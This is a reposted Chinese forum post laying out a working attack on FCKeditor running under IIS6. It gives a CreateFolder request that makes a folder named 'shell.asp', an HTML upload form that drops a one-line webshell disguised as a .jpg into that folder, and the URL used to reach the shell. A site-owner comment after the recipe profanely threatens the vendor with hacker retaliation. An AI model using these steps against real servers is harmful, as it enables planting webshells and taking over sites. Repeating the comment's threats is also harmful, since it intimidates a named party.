转自:http://t00ls.net/viewthread.php?tid=19888&extra=page%3D1%26amp%3Borderby%3Ddateline%26amp%3Bfilter%3D2592000&page=1
比较鸡肋,利用IIS6解析,需支持asp。
很简单的一个问题,又是死在fckeditor编辑器上。
http://www.xxx.com/FCKeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Media&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
建立一文件夹shell.asp
构造一表单,上传图片一句话马
<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxx.com/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?
Command=FileUpload&Type=Media&CurrentFolder=shell.asp" method="post">
上传文件:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
http://www.xxx.com/userfiles/media/shell.asp/test_asp;1.jpg
连接之。。。。
声明:该漏洞己提交官方,请勿利用该漏洞做非法事务,任何个人或单位利用该漏洞所造成的一切后果,均与本人无关。
站长评论:
听这位发漏洞的同学说,官方貌似很牛逼?不让发,还叫嚣着:后果自负!
那个什么垃圾公司,你他妈的算哪根葱?敢跟黑客叫板?你他妈的活腻了还是脑袋叫驴踢了?
一旦惹毛黑客,请该公司后果自负!
留言评论(旧系统):